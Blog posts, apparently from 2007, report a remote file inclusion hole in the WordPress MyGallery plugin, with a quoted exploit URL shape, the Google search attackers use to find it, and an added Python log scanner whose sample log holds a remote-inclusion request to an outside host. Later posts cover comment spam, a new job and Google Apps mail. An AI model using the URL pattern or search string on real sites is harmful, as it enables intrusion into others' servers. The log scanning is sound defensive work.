Are you really that stupid? Apparently.

Ever since the MyGallery exploit was brought to my attention, I’ve been checking my install of Mint to see what’s been going on with some of the pages here, and it’s amazing how many people (mostly ones that apparently don’t understand English) are still trying to access the mygallerybrowser.php file. The number of people googling for the issue, and the number that come straight to this site by copy/pasting in their “hacking” URL, amaze me. I even went as far as putting up goatse on the page they’re trying to access, but even that didn’t deter them from trying. It’s actually really annoying, because all of my logs are infested with this crap. Searches are almost 100% “inurl:/mygallery/myfunctions/”, and the same goes for referrals, give or take a few foreign hacking forums.

Seriously, the file. is. not. there. anymore. NOTHING IS GOING TO HAPPEN! But I am half tempted to recreate those files and fill them with a shitload of banner popup ads that’ll explode in their face when they access the page. Actually, yes, that is exactly what I am going to do.

Edit: Let’s see if they like tubgirl.

MyGallery plugin–possible security issue?

EDIT: I highly recommend that any user remove this script until a fix is available. The file being abused is /mygallerybrowser.php. The plugin’s creator (page translated from German to English) posted an update today saying to upgrade to the latest version or deactivate the plugin.

Earlier today I received an e-mail from “WaLhEZ” as follows:

Hi, i am visit you site, and see the problem with and I have seen that you have bug that even allows that somebody ill-disposed one can enter your host and provocate damage, obtaining pass of your FTP, dates base… etc the problem this in plugin mygallery, specifically in the file mygallerybrowser.php. This it is an example of as they can enter your servant and dañarte watches: wp-content/plugins/ mygallery/myfunctions /mygallerybrowser.php?myPath=(website)? And I communicate this to him, so that it fixes it, this bug I have discovered I to it, and I want to communicate it to it so that they are not going to him to damage his blog, that by the way this very pretty. I wait for its answer… And it pardons my English is not very good. Contacme and I see as I can help him.

When I received his e-mail, I didn’t know whether it was a hoax, since I knew I didn’t have the MyGallery plugin activated, though I did have it under my /plugins/ directory. But when I went to the URL he had included in his e-mail, I could still reach the file in that directory, albeit with some PHP errors. I then CHMODed the files so they couldn’t be accessed, and then deleted them from my server since I’m not using the plugin.

After deleting it I also went through my access logs and error logs, but didn’t see much activity other than what matched his IP address and mine in regard to the access URL and plugin directory. All day today, though, I’ve had a lot of hits coming from Google searches for “inurl:/mygallery/myfunctions” (without the quotes, and from various local Google domains too, like es, it, co.ma, and com.tr). I’ve also had quite a few hits from a hacking forum, Tryag.com/CC (the link is a direct link to the thread). Unfortunately the only way to view what is on that forum is by registering, and I believe that’s turned off. I didn’t run it through a translator, but I figured that’s what the message was saying.

I’m going to look more into this, but if you’re using this plugin, definitely keep an eye out. If you or someone else is using this plugin, feel free to link them to this entry. I’ll be updating it through the day(s) when I come across more information on the issue.
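The log checking described in this post and the one above it, written up as an added example (not the post’s own code, and not the plugin’s): it parses combined-format access log lines, tags requests to mygallerybrowser.php whose myPath value is a remote URL rather than a local path, and tags referrers carrying the inurl: search the posts mention. The log lines and addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Combined-format access log line: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PLUGIN_FILE = "/mygallery/myfunctions/mygallerybrowser.php"
DORK = "inurl:/mygallery/myfunctions"

def classify(match):
    """Tag one parsed log line; an empty list means nothing of interest."""
    tags = []
    url = urlparse(match.group("path"))
    if url.path.endswith(PLUGIN_FILE):
        tags.append("mygallerybrowser_hit")
        my_path = parse_qs(url.query).get("myPath", [""])[0]
        # A myPath value that starts with a URL scheme is the remote-inclusion
        # shape quoted in the post; a local gallery path never looks like that.
        if re.match(r"[a-z][a-z0-9+.-]*://", my_path, re.I):
            tags.append("remote_myPath")
    if DORK in unquote(match.group("referer")):
        tags.append("dork_referer")
    return tags

def scan(log_text):
    """Return [(client_ip, tags)] for every line that earned at least one tag."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match:
            tags = classify(match)
            if tags:
                hits.append((match.group("ip"), tags))
    return hits

# Constructed sample lines (RFC 5737 documentation addresses), not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Apr/2007:13:02:11 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://198.51.100.7/x.txt? HTTP/1.1" 404 301 "-" "Mozilla/4.0"
203.0.113.9 - - [28/Apr/2007:13:05:40 -0400] "GET /wp-content/plugins/mygallery/myfunctions/ HTTP/1.1" 404 301 "http://www.google.com/search?q=inurl%3A%2Fmygallery%2Fmyfunctions%2F" "Mozilla/5.0"
192.0.2.44 - - [28/Apr/2007:13:07:02 -0400] "GET /archives/2007/04/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

Feed it a real log with `scan(open("access.log").read())`; a 404 on the plugin path still counts as a hit, since the point is who is probing, not whether the file is there.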

Back to work!

After almost four months of working at home, I finally trekked back into the wonderful world of retail. I had my first day of work today; it was only orientation, so I didn’t do too much. Right now I’m only working part time, but I am still looking around for another full-time job. I’m actually waiting on Cingular to get back to me, and I believe I might have snagged a job this time around.

I finally managed to get atourworst.org back to normal. It ended up being the IP address the domain was resolving to that was causing the horrendous load time (close to 40+ seconds for me!). I was also having issues with spam bots hitting my site every minute and not being blocked by Akismet. But now the IP issue has been fixed, and the MySQL configuration has been tweaked to accommodate the site’s usage.

Thanks Bubs, Mari, and Jack for your suggestions on spam protection. I had actually installed Bad Behavior just after I posted that entry, and it was already starting to reduce the amount of comment spam. I also installed Comment Timeout, which is set to close comments on entries older than 60 days or that haven’t had a legitimate comment in 35 days. I realize it’ll inconvenience people who find those entries through search or otherwise and want to leave a comment, but hopefully they’ll contact me if it’s that important.

So far it’s worked wonders, and I haven’t had any spam problems (yesterday I had about 350+ “approved” spam comments make it through): Bad Behavior has stopped 414 access attempts since yesterday, and Akismet has managed to catch 88 comments from yesterday alone.

Things should be running along smoothly now! With all that done and done with my first day of work, I’m just waiting for Mark to stop by and then we’re heading to his friend Crystal’s apartment to play some Guitar Hero II for the Xbox 360.

Edit at 4/29/07 @ 1:08am — A few hours ago I got a call for another interview on Monday. I would love to have this job because it would put me back on the path with computers and their peripherals. It’s for a Tiger Direct store in my area. The best part about the phone call? He was highly impressed with my application. Ahem, I’ll take a bow now, thanks.

Comment Moderation

I have no idea what is going on with my site, but for some reason things feel wonky. My site’s load time has been pretty shoddy today; loading up my entries takes forever, and Akismet seems to be failing miserably.

I’ve been receiving comment spam every minute since 10am this morning, and Akismet hasn’t caught a single one of them. Somehow they all got approved. I have an inkling that a plugin I activated (then later deactivated) had some cataclysmic effect. I’ve probably deleted well over 100 spam comments that somehow got approved despite not having an e-mail address.

For now, until I find a suitable method of “protection” (I really don’t want to go the captcha route), I have set comments to be moderated unless the comment author is already in the database (and approved). So if you’re a new visitor to my website and you leave a comment, don’t fret. When I see it, I will approve it immediately!

503 Bandwidth Limit Exceeded + Google Apps

No doubt a lot of you are aware of this evil mockery of a “bandwidth exceeded” page. It’s honestly been a while since I’ve stumbled across a site showing a 503 page, given the large amounts of bandwidth that most hosts now include with their packages. Anyway, after viewing Bubs’ page and seeing that her bandwidth limit had been exceeded, I realized that the e-mail I was writing to her wouldn’t get to her until she either A) paid for more bandwidth to last her until the new month, or B) waited until May started and the bandwidth renewed. This was because she was using her domain+hosting to receive and send mail (at least, I’m assuming so).

Even though I can control my own bandwidth, I have my e-mail accounts hosted off my server. I currently use the Google Apps service for mail. There are two editions of Apps: Standard Edition, which is free, and Premier Edition, which is $50/year. If you want to see the difference, you can view their comparison. I currently have the Standard Edition, since I don’t use what Premier offers.

With Google Apps, you can create your own e-mail “service” that uses Gmail’s interface if you choose the webmail route, or you can use POP3 accounts that use Gmail’s POP and SMTP ports. Setting it up is very easy. When you go through the sign-up steps, it will give you two ways to verify that you own the domain name being used. Once the domain name is verified, you can set up your e-mail accounts through the interface (you can reach yours at http://google.com/hosted/atourworst.org). Once your accounts are set up to your liking, you will need to log into your domain’s control panel (cPanel, dhpanel, Ensim, et al.) and change your MX entries to the ones provided by Google (you don’t need to use all of these; you can pick one):

  • aspmx.l.google.com.
  • alt1.aspmx.l.google.com.
  • alt2.aspmx.l.google.com.
  • aspmx2.googlemail.com.
  • aspmx3.googlemail.com.
  • aspmx4.googlemail.com.
  • aspmx5.googlemail.com.
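A quick check that the MX change above actually took, added here as an example (not from the post or from Google): it parses `dig +short MX yourdomain` style output (constructed samples below, using example.org) and reports any exchange that is not one of the Google hosts listed, in particular a leftover host-panel MX with a lower preference number, which would still pull mail onto the web host that just hit its bandwidth limit.

```python
# Allowed Google mail exchanges, as listed in the post (trailing dot = absolute name).
GOOGLE_MX = {
    "aspmx.l.google.com.", "alt1.aspmx.l.google.com.", "alt2.aspmx.l.google.com.",
    "aspmx2.googlemail.com.", "aspmx3.googlemail.com.", "aspmx4.googlemail.com.",
    "aspmx5.googlemail.com.",
}

def parse_mx(dig_output):
    """Parse 'dig +short MX' style lines ('<preference> <exchange>') into sorted tuples."""
    records = []
    for line in dig_output.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        pref, exchange = parts
        exchange = exchange.lower()
        if not exchange.endswith("."):
            exchange += "."
        records.append((int(pref), exchange))
    return sorted(records)

def check_mx(dig_output):
    """Return a list of problems; an empty list means mail goes only to Google."""
    records = parse_mx(dig_output)
    if not records:
        return ["no MX records: mail falls back to the domain's A record, i.e. the web host"]
    problems = [f"non-Google exchange still listed: {ex}"
                for _, ex in records if ex not in GOOGLE_MX]
    best_pref, best_ex = records[0]
    if best_ex not in GOOGLE_MX:
        # Lowest preference wins, so a leftover host-panel MX here receives all mail first.
        problems.append(f"preference {best_pref} ({best_ex}) is tried before any Google exchange")
    return problems

# Constructed sample outputs (example.org names), not real lookups.
GOOD_MX = "1 aspmx.l.google.com.\n5 alt1.aspmx.l.google.com.\n5 alt2.aspmx.l.google.com.\n"
LEFTOVER_MX = "0 mail.example.org.\n10 aspmx.l.google.com.\n"

if __name__ == "__main__":
    for label, output in (("good", GOOD_MX), ("leftover", LEFTOVER_MX)):
        print(label, check_mx(output) or "ok")
```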

So even if your website has exceeded its bandwidth, or hell, your server is down, you’ll still be able to send and receive e-mail. The other reason I like this is Gmail’s spam box, which gets rid of all the junk, so I won’t have to worry about receiving hundreds of crap e-mails. I don’t use the webmail feature often, since I prefer POP3, but if I’m out and about (say at Mark’s place) I’ll just log into my GH account and check mail through there.

Here are some images of Google Hosted’s admin panel:
[Image: google hosted]